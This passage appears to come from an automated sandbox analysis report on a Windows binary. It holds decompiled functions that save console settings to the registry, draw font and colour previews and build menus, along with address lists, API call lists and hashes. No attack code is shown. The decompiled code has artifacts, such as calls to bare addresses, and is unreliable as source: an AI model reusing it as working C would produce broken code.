                                                  • RegSetValueExW.ADVAPI32(00000000,CursorVisible,00000000,00000004,00000001,00000004), ref: 00405E50
                                                  • RegSetValueExW.ADVAPI32(00000000,EditionMode,00000000,00000004,00000001,00000004), ref: 00405E89
                                                    • Part of subcall function 00404B80: GetDpiForSystem.USER32 ref: 00404BCC
                                                    • Part of subcall function 00404B80: MulDiv.KERNEL32(00000010,00000000), ref: 00404BD5
                                                    • Part of subcall function 00404B80: GetDpiForSystem.USER32 ref: 00404BE3
                                                    • Part of subcall function 00404B80: MulDiv.KERNEL32(00000008,00000000), ref: 00404BEC
                                                  • lstrcmpW.KERNEL32(-0000008C,?), ref: 00405EA3
                                                  • lstrlenW.KERNEL32(-0000008C), ref: 00405EB7
                                                  • RegSetValueExW.ADVAPI32(00000000,FaceName,00000000,00000001,-0000008C,?), ref: 00405ED9
                                                  • RegSetValueExW.ADVAPI32(00000000,FontPitchFamily,00000000,00000004,00000001,00000004), ref: 00405F12
                                                  • GetDpiForSystem.USER32 ref: 00405F3A
                                                  • MulDiv.KERNEL32(?,00000060,00000000), ref: 00405F4A
                                                  • GetDpiForSystem.USER32 ref: 00405F53
                                                  • MulDiv.KERNEL32(?,00000060,00000000), ref: 00405F63
                                                  • RegSetValueExW.ADVAPI32(00000000,FontSize,00000000,00000004,00000001,00000004), ref: 00405F9F
                                                  • RegSetValueExW.ADVAPI32(00000000,FontWeight,00000000,00000004,00000001,00000004), ref: 00405FD8
                                                  • RegSetValueExW.ADVAPI32(00000000,HistoryBufferSize,00000000,00000004,00000001,00000004), ref: 0040600E
                                                  • RegSetValueExW.ADVAPI32(00000000,HistoryNoDup,00000000,00000004,00000001,00000004), ref: 00406041
                                                  • RegSetValueExW.ADVAPI32(00000000,InsertMode,00000000,00000004,00000001,00000004), ref: 00406074
                                                  • RegSetValueExW.ADVAPI32(00000000,MenuMask,00000000,00000004,00000001,00000004), ref: 004060A7
                                                  • RegSetValueExW.ADVAPI32(00000000,PopupColors,00000000,00000004,00000001,00000004), ref: 004060DD
                                                  • RegSetValueExW.ADVAPI32(00000000,QuickEdit,00000000,00000004,00000001,00000004), ref: 00406110
                                                  • RegSetValueExW.ADVAPI32(00000000,ScreenBufferSize,00000000,00000004,00000001,00000004), ref: 0040616B
                                                  • RegSetValueExW.ADVAPI32(00000000,ScreenColors,00000000,00000004,00000001,00000004), ref: 004061A1
                                                  • RegSetValueExW.ADVAPI32(00000000,WindowSize,00000000,00000004,00000001,00000004), ref: 004061FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Value$System$lstrcmplstrlenwsprintf
                                                  • String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize
                                                  • API String ID: 4202061470-2593552325
                                                  • Opcode ID: c377fce4735b1483155afc4da19cac0cb70c38cc7ed8436257ffd1a2833aa6b5
                                                  • Instruction ID: 441eaab03b607b7a808d6496199c41919d270a7cf16c843be99aa31c8b4d6b29
                                                  • Opcode Fuzzy Hash: c377fce4735b1483155afc4da19cac0cb70c38cc7ed8436257ffd1a2833aa6b5
                                                  • Instruction Fuzzy Hash: 1902E574640208EFEB14DF50C885FAE7776FB44714F60C16AFA15AB281C778AE85CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403CD0 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E00403CD0(int _a4, int _a8, int _a12, long _a16) {
				int _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				int _v28;
				void* _v32;
				struct tagPAINTSTRUCT _v96;
				short _v608;

				_v8 = _a8;
				_v8 = _v8 - 1;
				if(_v8 > 0x30) {
					L15:
					return DefWindowProcW(_a4, _a8, _a12, _a16);
				}
				_t7 = _v8 + 0x403ef0; // 0xcccccc04
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M00403ED8))) {
					case 0:
						SetWindowLongW(_a4, 0, 0);
						goto L16;
					case 1:
						__eax = _a4;
						_v16 = GetWindowLongW(_a4, 0);
						if(_v16 != 0) {
							__ecx = _v16;
							__eax = DeleteObject(_v16);
						}
						goto L16;
					case 2:
						__eax = GetParent(_a4);
						_v12 = __eax;
						__eax =  &_v96;
						__ecx = _a4;
						__eax = BeginPaint(_a4,  &_v96);
						_v20 = GetWindowLongW(_a4, 0);
						if(_v20 != 0) {
							__eax = _v20;
							__ecx = _v96.hdc;
							_v32 = SelectObject(__ecx, _v20);
							_v24 = E00403FE0(__ecx, _v12, 0x203);
							__eax = _v24;
							__eax = CreateSolidBrush(_v24);
							__ecx =  &(_v96.rcPaint);
							__eax = _v24;
							__ecx = _v96.hdc;
							SetBkColor(__ecx, _v24) = E00403FE0(__ecx, _v12, 0x204);
							_v96.hdc = SetTextColor(_v96.hdc, _v96.hdc);
							__ecx =  &_v608;
							_push( &_v608);
							0x400000();
							__eax = GetModuleHandleW(0);
							__eax = LoadStringW(__eax, 0x201,  &_v608, __eax);
							_v28 = __eax;
							if(_v28 != 0) {
								__eax = _v28;
								__ecx =  &_v608;
								__eax = TextOutW(_v96.hdc, 0, 0,  &_v608, _v28);
							}
							_push(L"ASCII: abcXYZ");
							0x400000();
							__eax = __eax - 1;
							__eax = _v12;
							__ecx =  *(__eax + 0x48);
							__eax = _v32;
							__ecx = _v96.hdc;
							__eax = SelectObject(_v96.hdc, _v32);
						}
						_a4 = EndPaint(_a4,  &_v96);
						goto L16;
					case 3:
						__eax = _a12;
						__ecx = _a4;
						SetWindowLongW(_a4, 0, _a12) = __dx & 0x0000ffff;
						if((__dx & 0x0000ffff) != 0) {
							__ecx = _a4;
							InvalidateRect(_a4, 0, 1) = UpdateWindow(_a4);
						}
						L16:
						return 0;
					case 4:
						return GetWindowLongW(_a4, 0);
					case 5:
						goto L15;
				}
			}












                                                  0x00403cdc
                                                  0x00403ce5
                                                  0x00403cec
                                                  0x00403eb5
                                                  0x00000000
                                                  0x00403ec5
                                                  0x00403cf5
                                                  0x00403cfc
                                                  0x00000000
                                                  0x00403d0b
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d66
                                                  0x00403d70
                                                  0x00403d77
                                                  0x00403d79
                                                  0x00403d7d
                                                  0x00403d7d
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d8e
                                                  0x00403d9b
                                                  0x00403d9e
                                                  0x00403da2
                                                  0x00403da6
                                                  0x00403db8
                                                  0x00403dbf
                                                  0x00403dc5
                                                  0x00403dc9
                                                  0x00403dd3
                                                  0x00403de4
                                                  0x00403de7
                                                  0x00403deb
                                                  0x00403df2
                                                  0x00403e00
                                                  0x00403e04
                                                  0x00403e17
                                                  0x00403e21
                                                  0x00403e27
                                                  0x00403e2d
                                                  0x00403e2e
                                                  0x00403e42
                                                  0x00403e49
                                                  0x00403e4f
                                                  0x00403e56
                                                  0x00403e58
                                                  0x00403e5c
                                                  0x00403e6b
                                                  0x00403e6b
                                                  0x00403e71
                                                  0x00403e76
                                                  0x00403e7b
                                                  0x00403e84
                                                  0x00403e87
                                                  0x00403e97
                                                  0x00403e9b
                                                  0x00403e9f
                                                  0x00403e9f
                                                  0x00403ead
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d27
                                                  0x00403d2d
                                                  0x00403d40
                                                  0x00403d45
                                                  0x00403d4b
                                                  0x00403d59
                                                  0x00403d59
                                                  0x00403ecd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • SetWindowLongW.USER32 ref: 00403D0B
                                                  • GetWindowLongW.USER32(?,00000000), ref: 00403D1C
                                                  • SetWindowLongW.USER32 ref: 00403D31
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00403D4F
                                                  • UpdateWindow.USER32(?), ref: 00403D59
                                                  • GetWindowLongW.USER32(?,00000000), ref: 00403D6A
                                                  • DeleteObject.GDI32(00000000), ref: 00403D7D
                                                  • GetParent.USER32(?), ref: 00403D8E
                                                  • GetWindowLongW.USER32(00000000), ref: 00403D95
                                                  • BeginPaint.USER32(?,?), ref: 00403DA6
                                                  • GetWindowLongW.USER32(?,00000000), ref: 00403DB2
                                                  • SelectObject.GDI32(?,00000000), ref: 00403DCD
                                                  • CreateSolidBrush.GDI32(?), ref: 00403DEB
                                                  • FillRect.USER32 ref: 00403DFA
                                                  • SetBkColor.GDI32(?,?), ref: 00403E08
                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E21
                                                  • GetModuleHandleW.KERNEL32(00000000,00000201,?,00000000), ref: 00403E42
                                                  • LoadStringW.USER32(00000000), ref: 00403E49
                                                  • TextOutW.GDI32(?,00000000,00000000,?,00000000), ref: 00403E6B
                                                  • TextOutW.GDI32(?,00000000,?,ASCII: abcXYZ,-00000001), ref: 00403E91
                                                  • SelectObject.GDI32(?,?), ref: 00403E9F
                                                  • EndPaint.USER32(?,?), ref: 00403EAD
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00403EC5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$ObjectText$ColorPaintRectSelect$BeginBrushCreateDeleteFillHandleInvalidateLoadModuleParentProcSolidStringUpdate
                                                  • String ID: 0$ASCII: abcXYZ
                                                  • API String ID: 1130743042-3949429782
                                                  • Opcode ID: 9ce1c748a96f240f315aaebbc052465b5b3b8b2b4127d53cf1f5489e694250fa
                                                  • Instruction ID: 79a4f98bfe486f990abeb93be7cd05f9abb81cc7e6ad64475d903cedf329ab3a
                                                  • Opcode Fuzzy Hash: 9ce1c748a96f240f315aaebbc052465b5b3b8b2b4127d53cf1f5489e694250fa
                                                  • Instruction Fuzzy Hash: F1512FB5A10208EFCB04DFE4DC88FEF7B79AB48701F108569F615AB290CB759A45CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004021C0 Relevance: 42.2, APIs: 28, Instructions: 245COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E004021C0(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				signed int _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				long _v32;
				int _v36;
				signed int _v40;
				struct HBRUSH__* _v44;
				int _v48;
				long _v52;
				void* _v56;
				signed int _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v92;
				struct tagPAINTSTRUCT _v156;
				intOrPtr _t197;
				struct HWND__* _t208;
				struct HDC__* _t210;
				signed int _t211;
				struct tagRECT* _t228;
				signed int _t229;

				_v36 = _a8;
				if(_v36 == 0xf) {
					_t208 = _a4;
					BeginPaint(_t208,  &_v156);
					GetClientRect(_a4,  &_v76);
					asm("cdq");
					_v40 = _v76.right + (_t208 & 0x00000007) >> 3;
					_t210 = _a4;
					_v52 = GetWindowLongW(GetParent(_t210), 8);
					_v8 = 0;
					while(_v8 < 0x10) {
						asm("cdq");
						_t211 = _t210 & 0x00000007;
						asm("cdq");
						_v24.top = (_v8 + _t211 >> 3) * (_v76.bottom - _t211 >> 1);
						asm("cdq");
						_v24.bottom = (_v76.bottom - _t211 >> 1) + _v24.top;
						_v24.left = (_v8 & 0x00000007) * _v40;
						_v24.right = _v24.left + _v40;
						_v44 = CreateSolidBrush( *(_v52 + 4 + _v8 * 4));
						FillRect(_v156.hdc,  &_v24, _v44);
						DeleteObject(_v44);
						_t210 = _a4;
						if(GetWindowLongW(_t210, 0) != _v8) {
							L12:
							_v8 = _v8 + 1;
							continue;
						}
						_v28 = 2;
						_v56 = SelectObject(_v156.hdc, GetStockObject(6));
						_v24.right = _v24.right - 1;
						_v24.bottom = _v24.bottom - 1;
						while(1) {
							MoveToEx(_v156.hdc, _v24.left, _v24.bottom, 0);
							LineTo(_v156.hdc, _v24.left, _v24.top);
							LineTo(_v156.hdc, _v24.right, _v24.top);
							SelectObject(_v156.hdc, GetStockObject(7));
							LineTo(_v156.hdc, _v24.right, _v24.bottom);
							LineTo(_v156.hdc, _v24.left, _v24.bottom);
							_t197 = _v28 - 1;
							_v28 = _t197;
							if(_t197 == 0) {
								break;
							}
							_v24.left = _v24 + 1;
							_v24.top = _v24.top + 1;
							_v24.right = _v24.right - 1;
							_v24.bottom = _v24.bottom - 1;
							SelectObject(_v156.hdc, GetStockObject(6));
						}
						_t210 = _v156;
						SelectObject(_t210, _v56);
						goto L12;
					}
					EndPaint(_a4,  &_v156);
					L19:
					return 0;
				}
				if(_v36 == 0x201) {
					_t228 =  &_v92;
					GetClientRect(_a4, _t228);
					asm("cdq");
					_t229 = _t228 & 0x00000007;
					_v60 = _v84 + _t229 >> 3;
					asm("cdq");
					if((_a16 >> 0x00000010 & 0xffff) < _v80 - _t229 >> 1) {
						_v48 = 0;
					} else {
						_v48 = 8;
					}
					_v32 = _v48;
					asm("cdq");
					_v32 = (_a16 & 0xffff) / _v60 + _v32;
					SetWindowLongW(_a4, 0, _v32);
					InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
					InvalidateRect(_a4, 0, 0);
					goto L19;
				}
				return DefWindowProcW(_a4, _a8, _a12, _a16);
			}

























                                                  0x004021cc
                                                  0x004021d3
                                                  0x004021ee
                                                  0x004021f2
                                                  0x00402200
                                                  0x00402209
                                                  0x00402212
                                                  0x00402217
                                                  0x00402228
                                                  0x0040222b
                                                  0x0040223d
                                                  0x0040224a
                                                  0x0040224b
                                                  0x00402258
                                                  0x00402260
                                                  0x00402266
                                                  0x0040226e
                                                  0x0040227b
                                                  0x00402284
                                                  0x00402298
                                                  0x004022aa
                                                  0x004022b4
                                                  0x004022bc
                                                  0x004022c9
                                                  0x004023df
                                                  0x0040223a
                                                  0x00000000
                                                  0x0040223a
                                                  0x004022cf
                                                  0x004022ec
                                                  0x004022f5
                                                  0x004022fe
                                                  0x00402301
                                                  0x00402312
                                                  0x00402327
                                                  0x0040233c
                                                  0x00402352
                                                  0x00402367
                                                  0x0040237c
                                                  0x00402385
                                                  0x00402388
                                                  0x0040238b
                                                  0x00000000
                                                  0x00000000
                                                  0x00402395
                                                  0x0040239e
                                                  0x004023a7
                                                  0x004023b0
                                                  0x004023c3
                                                  0x004023c3
                                                  0x004023d2
                                                  0x004023d9
                                                  0x00000000
                                                  0x004023d9
                                                  0x004023ef
                                                  0x004024b6
                                                  0x00000000
                                                  0x004024b6
                                                  0x004021dc
                                                  0x004023fa
                                                  0x00402402
                                                  0x0040240b
                                                  0x0040240c
                                                  0x00402414
                                                  0x00402429
                                                  0x00402430
                                                  0x0040243b
                                                  0x00402432
                                                  0x00402432
                                                  0x00402432
                                                  0x00402445
                                                  0x00402453
                                                  0x0040245a
                                                  0x00402467
                                                  0x00402488
                                                  0x00402496
                                                  0x00000000
                                                  0x00402496
                                                  0x00000000

                                                  APIs
                                                  • BeginPaint.USER32(?,?), ref: 004021F2
                                                  • GetClientRect.USER32 ref: 00402200
                                                  • GetParent.USER32(?), ref: 0040221B
                                                  • GetWindowLongW.USER32(00000000), ref: 00402222
                                                  • CreateSolidBrush.GDI32(00000010), ref: 00402292
                                                  • FillRect.USER32 ref: 004022AA
                                                  • DeleteObject.GDI32(?), ref: 004022B4
                                                  • GetWindowLongW.USER32(?,00000000), ref: 004022C0
                                                  • GetStockObject.GDI32(00000006), ref: 004022D8
                                                  • SelectObject.GDI32(?,00000000), ref: 004022E6
                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00402312
                                                  • GetClientRect.USER32 ref: 00402402
                                                  • SetWindowLongW.USER32 ref: 00402467
                                                  • GetParent.USER32(?), ref: 0040247A
                                                  • GetDlgItem.USER32 ref: 00402481
                                                  • InvalidateRect.USER32(00000000), ref: 00402488
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00402496
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004024AE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemMovePaintProcSelectSolidStock
                                                  • String ID:
                                                  • API String ID: 4085835047-0
                                                  • Opcode ID: 17c9f886189e01ccf5b9d113390713578b16aee4fcd0cbc763b7d8f5c916b4ab
                                                  • Instruction ID: 9303a75ab2c3ba74b8f95ecbcbdcd489286eec20776981bf3f25c8e5d723df10
                                                  • Opcode Fuzzy Hash: 17c9f886189e01ccf5b9d113390713578b16aee4fcd0cbc763b7d8f5c916b4ab
                                                  • Instruction Fuzzy Hash: 89A1B8B5900109AFCB44DFE8D988AEEBBB5BB4C301F14C559F909A7290CB74AA45CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403A30 Relevance: 31.7, APIs: 21, Instructions: 192windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 62%
                                                  			E00403A30(struct HMENU__* _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				struct HMENU__* _v12;
				short _v524;
				int _t55;
				int _t58;
				int _t62;
				int _t66;
				int _t69;
				int _t73;
				int _t76;
				int _t80;
				int _t84;

				_v8 = GetModuleHandleW(0);
				if(_a4 != 0) {
					_v12 = CreateMenu();
					if(_v12 != 0) {
						_t55 =  &_v524;
						0x400000(_t55);
						LoadStringW(_v8, 0x110,  &_v524, _t55);
						_t58 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x110,  &_v524);
						0x400000( &_v524);
						LoadStringW(_v8, 0x111,  &_v524, _t58);
						_t62 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x111,  &_v524);
						0x400000( &_v524);
						LoadStringW(_v8, 0x112,  &_v524, _t62);
						InsertMenuW(_v12, 0xffffffff, 0x400, 0x112,  &_v524);
						_t66 =  &_v524;
						0x400000(_t66);
						LoadStringW(_v8, 0x113,  &_v524, _t66);
						_t69 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x113,  &_v524);
						0x400000( &_v524);
						LoadStringW(_v8, 0x114,  &_v524, _t69);
						_t73 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x114,  &_v524);
						0x400000( &_v524);
						LoadStringW(_v8, 0x115,  &_v524, _t73);
						_t76 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x115,  &_v524);
						if(_a8 != 0) {
							_t76 = InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
						}
						0x400000( &_v524);
						LoadStringW(_v8, 0x100,  &_v524, _t76);
						_t80 = InsertMenuW(_a4, 0xffffffff, 0x410, _v12,  &_v524);
						0x400000( &_v524);
						LoadStringW(_v8, 0x101,  &_v524, _t80);
						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v524);
						_t84 =  &_v524;
						0x400000(_t84);
						LoadStringW(_v8, 0x102,  &_v524, _t84);
						InsertMenuW(_a4, 0xffffffff, 0x400, 0x102,  &_v524);
						return 1;
					}
					return 0;
				}
				return 0;
			}















                                                  0x00403a41
                                                  0x00403a48
                                                  0x00403a57
                                                  0x00403a5e
                                                  0x00403a67
                                                  0x00403a6e
                                                  0x00403a84
                                                  0x00403aa1
                                                  0x00403aae
                                                  0x00403ac4
                                                  0x00403ae1
                                                  0x00403aee
                                                  0x00403b04
                                                  0x00403b21
                                                  0x00403b27
                                                  0x00403b2e
                                                  0x00403b44
                                                  0x00403b61
                                                  0x00403b6e
                                                  0x00403b84
                                                  0x00403ba1
                                                  0x00403bae
                                                  0x00403bc4
                                                  0x00403be1
                                                  0x00403beb
                                                  0x00403bfc
                                                  0x00403bfc
                                                  0x00403c09
                                                  0x00403c1f
                                                  0x00403c3b
                                                  0x00403c48
                                                  0x00403c5e
                                                  0x00403c7b
                                                  0x00403c81
                                                  0x00403c88
                                                  0x00403c9e
                                                  0x00403cbb
                                                  0x00000000
                                                  0x00403cc1
                                                  0x00000000
                                                  0x00403a60
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403A3B
                                                  • CreateMenu.USER32 ref: 00403A51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CreateHandleMenuModule
                                                  • String ID:
                                                  • API String ID: 4123625242-0
                                                  • Opcode ID: 44af2e04ee94a2477b6f80a20243c39a53ae9f5717a535503f9b3983751ddad9
                                                  • Instruction ID: 08dd7e0be59b5a95a72c3cfd9a68bba1d091cf2ad76ef5236de47ab009263b15
                                                  • Opcode Fuzzy Hash: 44af2e04ee94a2477b6f80a20243c39a53ae9f5717a535503f9b3983751ddad9
                                                  • Instruction Fuzzy Hash: 00713DB5A4021CBBDF54DBA0CC49FDB7739EB44B14F108799B361A70D1DE74AA808B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004024C0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 136registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E004024C0(intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				WCHAR* _v12;
				struct _WNDCLASSW _v52;
				intOrPtr _v56;
				void _v264;
				void* _v268;
				void _v472;
				intOrPtr _v976;
				intOrPtr _v980;
				short _v984;
				void* __edi;
				int _t70;
				intOrPtr _t83;
				short _t95;
				intOrPtr _t101;
				void* _t103;

				L0040A30C();
				E0040D210(_t103,  &_v268, 0, 0xd4);
				_v268 = _a4;
				if(_a8 == 0) {
					E00404B80(0,  &_v264);
				} else {
					E00402B50(_a4,  &_v264);
				}
				memcpy( &_v472,  &_v264, 0x33 << 2);
				_v52.style = 0;
				_v52.lpfnWndProc = E00403CD0;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 4;
				_v52.hInstance = GetModuleHandleW(0);
				_v52.hIcon = 0;
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = GetStockObject(4);
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"WineConFontPreview";
				RegisterClassW( &_v52);
				_v52.style = 0;
				_v52.lpfnWndProc = E004021C0;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 4;
				_v52.hInstance = GetModuleHandleW(0);
				_v52.hIcon = 0;
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = GetStockObject(4);
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"WineConColorPreview";
				_t70 = RegisterClassW( &_v52);
				if(_a8 == 0) {
					_v8 = 0x120;
				} else {
					_v8 = 0x121;
				}
				0x400000( &_v984);
				if(LoadStringW(GetModuleHandleW(0), _v8,  &_v984, _t70) == 0) {
					_t95 = L"Setup"; // 0x650053
					_v984 = _t95;
					_t101 =  *0x41f2a4; // 0x750074
					_v980 = _t101;
					_t83 =  *0x41f2a8; // 0x70
					_v976 = _t83;
				}
				_v56 = E0040B504( &_v472,  &_v264, 0xcc);
				if(_v56 != 0) {
					if(_a8 != 0) {
						E00401CB0(_a4,  &_v264);
						E00407B50(_v268);
					}
					if(_a8 == 0) {
						_v12 = 0;
					} else {
						_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
					}
					E00405CF0(_v12,  &_v264);
					return 1;
				} else {
					return 1;
				}
			}



















                                                  0x004024cb
                                                  0x004024de
                                                  0x004024e9
                                                  0x004024f3
                                                  0x00402510
                                                  0x004024f5
                                                  0x00402500
                                                  0x00402500
                                                  0x00402526
                                                  0x00402528
                                                  0x0040252f
                                                  0x00402536
                                                  0x0040253d
                                                  0x0040254c
                                                  0x0040254f
                                                  0x00402563
                                                  0x0040256e
                                                  0x00402571
                                                  0x00402578
                                                  0x00402583
                                                  0x00402589
                                                  0x00402590
                                                  0x00402597
                                                  0x0040259e
                                                  0x004025ad
                                                  0x004025b0
                                                  0x004025c4
                                                  0x004025cf
                                                  0x004025d2
                                                  0x004025d9
                                                  0x004025e4
                                                  0x004025ee
                                                  0x004025f9
                                                  0x004025f0
                                                  0x004025f0
                                                  0x004025f0
                                                  0x00402607
                                                  0x00402629
                                                  0x0040262b
                                                  0x00402631
                                                  0x00402637
                                                  0x0040263d
                                                  0x00402643
                                                  0x00402648
                                                  0x00402648
                                                  0x00402669
                                                  0x00402670
                                                  0x0040267d
                                                  0x0040268a
                                                  0x00402696
                                                  0x00402696
                                                  0x0040269f
                                                  0x004026b2
                                                  0x004026a1
                                                  0x004026ad
                                                  0x004026ad
                                                  0x004026c4
                                                  0x00000000
                                                  0x00402672
                                                  0x00000000
                                                  0x00402672

                                                  APIs
                                                  • #17.COMCTL32 ref: 004024CB
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?), ref: 00402546
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040255D
                                                  • GetStockObject.GDI32(00000004), ref: 00402568
                                                  • RegisterClassW.USER32 ref: 00402583
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004025A7
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004025BE
                                                  • GetStockObject.GDI32(00000004), ref: 004025C9
                                                  • RegisterClassW.USER32 ref: 004025E4
                                                  • GetModuleHandleW.KERNEL32(00000000,00000120,?,00000000), ref: 0040261A
                                                  • LoadStringW.USER32(00000000), ref: 00402621
                                                  • _memcmp.LIBVCRUNTIME ref: 00402661
                                                    • Part of subcall function 00407B50: IsWindowVisible.USER32 ref: 00407BB9
                                                    • Part of subcall function 00407B50: GetDC.USER32(?), ref: 00407C2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow_memcmp
                                                  • String ID: Setup
                                                  • API String ID: 323827257-3839654196
                                                  • Opcode ID: 2e00a79dc07ff8ea0e03e896b10f3c0b96ef7051c37b4111a897907864eb7786
